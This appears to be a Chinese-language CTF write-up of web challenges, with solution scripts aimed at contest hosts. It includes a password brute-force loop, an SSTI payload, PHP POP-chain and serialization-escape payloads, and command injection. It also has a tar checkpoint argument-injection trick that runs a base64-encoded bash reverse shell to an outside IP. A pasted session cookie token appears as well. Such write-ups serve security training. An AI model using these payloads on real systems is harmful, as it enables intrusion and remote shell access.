web

babyupload

img

.htaccess

img

执行env即可

ez!http

img

find-the-id

img

tflock

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests
url = "http://27.25.151.80:36338/login.php"

# ctfer:123456
# admin:x
a = True
with open("./passs.txt", encoding="utf-8") as fp:
user_list = ["admin", "ctfer"]
while a == True:
i = 0
for line in fp:
line = line[:-1:]

# print(i)
data = {
"username": user_list[0],
"password": line
}
res = requests.post(url= url, data= data)
# print(res.text)
a = res.text
print(data)
if "false" not in res.text:
print("找到啦")
print(res.text)
print(data)
a = False
break
i += 1



data = {
"username": user_list[1],
"password": 123456
}
res = requests.post(url=url, data=data)
# print(res.text)
# print(data)
i += 1
if i>510:
a = False
break

我写的网站被rce了?

进程等功能都给写死了,只有日志有可能,ua日志注入无文件包含不可行,考虑直接命令执行

img

RedFlag

current_app直接有了

img

1
http://27.25.151.80:36746/redflag/%7B%7Burl_for.__globals__['current_app'].config

LovePopChain

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
class MyObject{
public $NoLove="Do_You_Want_Fl4g?"; //4 hybcx
public $Forgzy; //2 GaoZhouYue
public function __wakeup()
{
if($this->NoLove == "Do_You_Want_Fl4g?"){
echo 'Love but not getting it!!';
}
}
public function __invoke()
{
$this->Forgzy = clone new GaoZhouYue();
}
}

class GaoZhouYue{
public $Yuer;
public $LastOne;
public function __clone()
{
echo '最后一次了, 爱而不得, 未必就是遗憾~~';
eval($_POST['y3y4']); //1 shell
}
}

class hybcx{
public $JiuYue;
public $Si; //3 Myobject

public function __call($fun1,$arg){
$this->Si->JiuYue=$arg[0];
}

public function __toString(){
$ai = $this->Si;
echo 'I W1ll remember you';
return $ai();
}
}

$myObject = new MyObject();
$hybcx = new hybcx();
$GaoZhouYue = new GaoZhouYue();
$myObject->Forgzy=$GaoZhouYue;
$hybcx->Si=$myObject;
$myObject->NoLove=$hybcx;
echo serialize($myObject);

ez_md5

ffifdyop进入

不知道为毛必须得去掉headers中的某些东西….

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests

url = "http://27.25.151.80:41564/LnPkcKqy_levl2.php?a[]=1&b[]=2"
data = {
'Build[CTF.com': '1145146803531'
}
# headers = {
# 'Content-Length': '37',
# 'Cache-Control': 'max-age=0',
# 'Origin': 'http://27.25.151.80:41564',
# 'Content-Type': 'application/x-www-form-urlencoded',
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
# 'Accept-Encoding': 'gzip, deflate, br',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
# 'Cookie': 'td_cookie=3576260328; uuid=6a1408da-f9dd-4455-8504-7988271a261f; GZCTF_Token=CfDJ8HK89lxLDJFGkMjPh05_xUrhLcicnBNanJVe0rYSyoH6EhKFk6c70AFLnkCa55xcULZZROJRM6tBxXkvknmTw1ir2Nl9fk3nWiD-k408_PcnB4e25kUPI8bdzhJln1m2p3KxyrB-w9OTcp8hqXVeHVbqXUI5ouvMEpUM6WHPBG4cC-EFaL4TgIgMYzjSkcHXPGVfID2akFHPwJgaVc1N-YXw-nsOO0mErVm9S7X0YwI6N5ezklCAfOc_PvHsBzrMc5kqha6uwzlOZBNSVVbOyGD_5HLVCdPMTVy-UU4W_xi-CVzAVeR1WEnou8D7niiSsFEM9cxK4OdafwDyiFs69q8VSZiuIGmPyzCGKlw15sJo1GnxscS2Q8Y5qqgKXeKAco8UaoJ6i7vMfxeHQSSpWFhD-LE1Dh6INwR0gtAK_e6j_XzRqO1It4W67667q9bjOenz_yz-ckPRnwFRB053VZwrSFIX6I9pYPnT9w1-q-UHTSJJvi-dg9lCt5KEbZ9hETIJmtzTvLPKOOx9rQFTL2sRPVWvSku4iiTRVnpUWPRCRUMUREQaZiA1jqOz9xFMfijSt0drJKaHgMUI2ee0F65FhGbFFER_OCmi7xW0SQs_FlAIkI1z3LepuDwYfCchhK9UhlwLZYhZ0j4S3B8Nhz-xPUwn1zAzxyp7GzSfmMsWU0ibzt4vwyls0Fye9girM7PecIwLQwbnIvDITJG_Hbk',
# 'Connection': 'close'
# }

response = requests.post(url, data=data)

print(response.text)

eazyl0gin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
var express = require('express');
var router = express.Router();
const crypto = require('crypto');
const { type } = require('os');

/* GET users listing. */
router.get('/', function(req, res, next) {
res.send('respond with a resource');
});

router.post('/login',function(req,res,next){
var data = {
username: String(req.body.username),
password: String(req.body.password)
}
const md5 = crypto.createHash('md5');
const flag = process.env.flag

if(data.username.toLowerCase()==='buildctf'){
return res.render('login',{data:"你不许用buildctf账户登陆"})
}

if(data.username.toUpperCase()!='BUILDCTF'){
return res.render('login',{data:"只有buildctf这一个账户哦~"})
}

var md5pwd = md5.update(data.password).digest('hex')
if(md5pwd.toLowerCase()!='b26230fafbc4b147ac48217291727c98'){
return res.render('login',{data:"密码错误"})
}
return res.render('login',{data:flag})

})
module.exports = router;

[技巧收藏]javascript大小写转换的特性 - K1ra8 - 博客园

img

img

sub

img

替换jwt

img

img

拼接命令造成命令执行

img

打包给你

tar参数注入

掌控安全CTF - 8月(WEB&AWD方向)_showdoc漏洞 ctf-CSDN博客

img

img

1
2
3
4
echo 'bash -c "bash -i >& /dev/tcp/1.1.1.1/10086 0>&1"' | base64
echo "" > "--checkpoint-action=exec=echo [base64_reverseshell_payload] | base64 -d | bash" # 生成第一个文件
echo "" > --checkpoint=1 # 生成第二个文件
echo "" > test.txt # 生成第三个文件

img

只能socket连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
const io = require('socket.io-client');

const clients = [];

const numberOfClicks = 10;

const serverUrl = 'ws://27.25.151.80:41924/';

for (let i = 0; i < 1; i++) {
const client = io.connect(serverUrl);
clients.push(client);

client.on('connect', () => {
console.log(`Client ${client.id} connected`);

for (let j = 0; j < numberOfClicks; j++) {

const clickEvent = {
value: 0,
power: 1000000000000000000000
};

client.emit('click', JSON.stringify(clickEvent));
}
});

client.on('recievedScore', (data) => {
const score = JSON.parse(data);
console.log(`Client ${client.id} received
score:${score.value}`);
});

client.on('error', (data) => {
console.error(`Client ${client.id} received error:${data}`);
});
}

img

Why_so_serials?

字符串逃逸

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php


class Gotham{
public $Bruce = '123';
public $Wayne = 'joker';
public $crime=true;
// public function __construct($Bruce,$Wayne){
// $this->Bruce = $Bruce;
// $this->Wayne = $Wayne;
// }
}

$a = new Gotham();

echo serialize($a);

O:6:"Gotham":3:{s:5:"Bruce";s:3:"123";s:5:"Wayne";s:5:"joker";s:5:"crime";b:1;}

$s = 'jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}'

'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}'

http://27.25.151.80:41971?Bruce=123&Wayne=jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}

刮刮乐

http://27.25.151.80:41999/?cmd=cat /fl* | tee 1.txt

img

ez_waf

溢出使waf失效

img

fake_signin

受泰山杯文件上传的条件竞争启发

同时发包完成签到

img